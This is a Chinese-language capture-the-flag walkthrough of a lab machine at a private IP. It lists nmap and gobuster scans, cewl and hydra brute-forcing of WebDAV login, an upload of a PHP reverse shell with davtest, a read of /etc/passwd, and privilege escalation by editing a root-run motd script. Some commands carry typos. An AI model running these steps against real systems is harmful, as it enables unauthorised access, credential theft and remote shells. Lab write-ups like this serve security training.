目标IP:192.168.3.134
发现开放的端口
sudo nmap -p- 192.168.3.134
探索端口的拥有的路径
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.3.134
webdav账号密码登录
在这里发现弹出来了一个账号密码的登录窗口,使用cewl生成语义化的字典
cewl http::/192.168.3.134 -w dict.txt
然后尝试破解密码
hydra -L dict.txt -P dict.txt 192.168.3.134 http-get /webdav -v
上传文件到FTP
davtest -url http://192.168.3.134/webdav -auth yamdoot:Swarg
至此可以知道可以上传shell脚本到远程的FTP服务
davtest -url http://192.168.3.134/webdav -auth yamdoot:Swarg -uploadfile php-reverse-shell.php -uploadl.php
探索靶机
find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null
发现一个脚本,解密得到: chitragupt
利用 cat /etc/passwd 得到另一个用户: inferno
发现该系统上有三个账户,为了得到好用的shell操作环境那么:ssh inferno@192.168.3.134,继续查找root权限且当前用户可写的文件
find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null
nano /etc/update-motd.d/00-header
google得到这个文件的作用:Forbidden - Stack Exchange
修改欢迎语,重新登录
DONE
,